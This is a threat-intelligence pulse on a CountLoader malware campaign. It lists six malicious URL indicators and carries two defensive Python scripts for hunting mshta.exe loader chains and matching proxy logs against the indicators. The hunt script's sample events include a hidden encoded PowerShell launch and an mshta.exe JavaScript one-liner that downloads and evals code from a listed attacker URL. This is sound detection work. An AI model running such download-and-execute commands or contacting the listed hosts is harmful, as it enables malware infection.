Pulse: IOC - Sinkholing CountLoader: Insights into Its Recent Campaign
TLP:WHITE | Author: celestre | Created: 2026-05-20 | Modified: 2026-05-20
IOCs: 51 (HIGH VOLUME)
McAfee Labs has recently uncovered a large-scale CountLoader campaign that uses multiple layers of obfuscation and staged payload delivery to evade detection and maintain persistence on infected systems. The infection chain relies on several layers of loaders: PowerShell scripts, obfuscated JavaScript executed through mshta.exe, and in-memory shellcode injection, with each stage decrypting and launching the next. The attackers use a custom encrypted communication protocol to interact with their C2 servers.
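The description above gives the process-level shape of the chain (a PowerShell stage that runs obfuscated JavaScript through mshta.exe). The following hunt logic, an added example that is not McAfee's or the pulse author's code, flags mshta.exe executions that carry an inline script protocol handler or a remote URL, or that were spawned by PowerShell. The events are constructed, not real telemetry; the reuse of one pulse URL inside a sample command line is an assumption made only to tie the sample to this page, and the exact command-line forms CountLoader uses are not stated on the page.

```python
"""Hunt for the PowerShell -> mshta.exe stage over constructed process-creation
events. Added example; not code from McAfee Labs or from the OTX pulse."""
import re
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

# Constructed sample events (assumption: Sysmon/EDR-style process creation records).
# pid 300 is the suspicious one: mshta.exe spawned by PowerShell with an inline
# javascript: handler that pulls a second stage from a URL listed on this pulse.
EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe \"javascript:a=new ActiveXObject('MSXML2.XMLHTTP');"
              "a.open('GET','https://hell1-kitty.cc/gamecenter.fileManager',0);"
              "a.send();eval(a.responseText)\""),
    ProcEvent(400, 100, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Users\alice\Documents\help.hta"),   # local .hta, explorer parent
    ProcEvent(500, 100, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

INLINE_SCRIPT = re.compile(r"\b(?:javascript|vbscript|about):", re.IGNORECASE)
REMOTE_URL = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe")

def basename(image: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def mshta_cmdline_indicators(cmdline: str) -> List[str]:
    """Reasons an mshta.exe command line looks like a loader stage."""
    hits = []
    if INLINE_SCRIPT.search(cmdline):
        hits.append("inline script protocol handler")
    if REMOTE_URL.search(cmdline):
        hits.append("remote URL argument")
    return hits

def hunt_mshta_chain(events: List[ProcEvent]) -> List[Dict]:
    """Return one finding per mshta.exe event that has at least one indicator."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if basename(e.image) != "mshta.exe":
            continue
        reasons = mshta_cmdline_indicators(e.cmdline)
        parent = by_pid.get(e.ppid)
        if parent is not None and basename(parent.image) in SCRIPT_HOSTS:
            reasons.append(f"parent is {basename(parent.image)} (pid {parent.pid})")
        if reasons:
            findings.append({"pid": e.pid, "cmdline": e.cmdline, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in hunt_mshta_chain(EVENTS):
        print(f["pid"], f["reasons"])
        print("   ", f["cmdline"])
```

A plain mshta.exe launched from Explorer with a local .hta (pid 400) is deliberately not flagged, so the rule keys on the loader behaviour (inline script, remote fetch, script-host parent) rather than on mshta.exe alone; in a real environment the parent check should also cover wscript.exe/cscript.exe and the fetch regex should be applied to the decoded form of any -enc PowerShell argument.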
Indicators of Compromise (6 of 51 shown; the pulse also carries FileHash-MD5, FileHash-SHA1, FileHash-SHA256 and domain indicators that are not displayed on this page)

TYPE   INDICATOR                                                DESCRIPTION   CREATED
URL    https://edr-security-bucket1.cc/                         -             2026-05-20
URL    https://hardware-office.cc/foundation.halflife           -             2026-05-20
URL    https://hell1-kitty.cc/gamecenter.fileManager            -             2026-05-20
URL    https://hell1-kitty.cc/update1_usb_usb_usb.VOcx4wEV8     -             2026-05-20
URL    https://memory-scanner.cc/                               -             2026-05-20
URL    https://memory-scanner.cc/Presentation.pdf               -             2026-05-20
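To put the six URL indicators above to use, the following script, an added example and not part of the pulse, matches them against web-proxy log lines. It normalises URLs before comparison (lower-cased scheme and host, a bare host treated as the root path) so that trivially different spellings of the same request still hit, and it additionally matches on the host of each listed URL, including subdomains, so that a CONNECT tunnel or an unlisted path on a listed host is still surfaced. That host-level matching is an added heuristic: the page lists only URL rows, and the domain indicators it says the pulse contains are not shown, so treat a "domain" hit as lower confidence than an exact "url" hit. The log format and all log lines are constructed.

```python
"""Match the pulse's URL indicators against proxy log lines.
Added example; not code from the OTX pulse or from McAfee Labs."""
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import urlsplit

# The six URL indicators visible on the pulse page.
PULSE_URLS = [
    "https://edr-security-bucket1.cc/",
    "https://hardware-office.cc/foundation.halflife",
    "https://hell1-kitty.cc/gamecenter.fileManager",
    "https://hell1-kitty.cc/update1_usb_usb_usb.VOcx4wEV8",
    "https://memory-scanner.cc/",
    "https://memory-scanner.cc/Presentation.pdf",
]

# Constructed proxy log (assumption: "<epoch> <client> <method> <url> <status>").
SAMPLE_PROXY_LOG = """\
1779264000.101 10.0.0.15 GET https://memory-scanner.cc/Presentation.pdf 200
1779264001.202 10.0.0.15 GET https://EDR-Security-Bucket1.cc 200
1779264002.303 10.0.0.22 GET https://cdn.hell1-kitty.cc/stage2.bin 200
1779264003.404 10.0.0.22 CONNECT hardware-office.cc:443 200
1779264004.505 10.0.0.31 GET https://example.com/index.html 200
1779264005.606 10.0.0.31 GET https://notmemory-scanner.cc/ 200
"""

def normalize_url(url: str) -> str:
    """Canonical form: lower-case scheme and host, root path spelled as '/',
    path and query kept case-sensitive (the pulse has mixed-case paths)."""
    p = urlsplit(url.strip())
    host = (p.hostname or "").lower()
    out = f"{p.scheme.lower()}://{host}{p.path or '/'}"
    if p.query:
        out += "?" + p.query
    return out

def host_matches(host: str, ioc_host: str) -> bool:
    """Exact host or any subdomain of the indicator host."""
    return host == ioc_host or host.endswith("." + ioc_host)

def match_request(url_field: str, exact_urls: Set[str],
                  ioc_hosts: Set[str]) -> Optional[Tuple[str, str]]:
    """('url', ioc) for an exact indicator hit, ('domain', ioc) for a host hit, else None."""
    if "://" in url_field:
        norm = normalize_url(url_field)
        if norm in exact_urls:
            return ("url", norm)
        host = (urlsplit(url_field).hostname or "").lower()
    else:
        # CONNECT requests log "host:port" with no scheme.
        host = url_field.rsplit(":", 1)[0].lower()
    for ioc in sorted(ioc_hosts):
        if host_matches(host, ioc):
            return ("domain", ioc)
    return None

def scan_proxy_log(lines: List[str], urls: List[str] = PULSE_URLS) -> List[Dict]:
    """Run every log line against the indicator set; one hit record per matching line."""
    exact = {normalize_url(u) for u in urls}
    hosts = {(urlsplit(u).hostname or "").lower() for u in urls}
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) < 4:
            continue          # malformed or truncated line; skip rather than crash
        _ts, client, _method, url_field = parts[:4]
        m = match_request(url_field, exact, hosts)
        if m is not None:
            hits.append({"line": n, "client": client, "kind": m[0],
                         "ioc": m[1], "request": url_field})
    return hits

if __name__ == "__main__":
    for h in scan_proxy_log(SAMPLE_PROXY_LOG.splitlines()):
        print(f"line {h['line']}: {h['client']} {h['kind']:6} {h['ioc']}  <- {h['request']}")
```

The last sample line (notmemory-scanner.cc) is there to show why the host check requires a dot boundary rather than a plain suffix match; a suffix match would have produced a false positive on an unrelated domain.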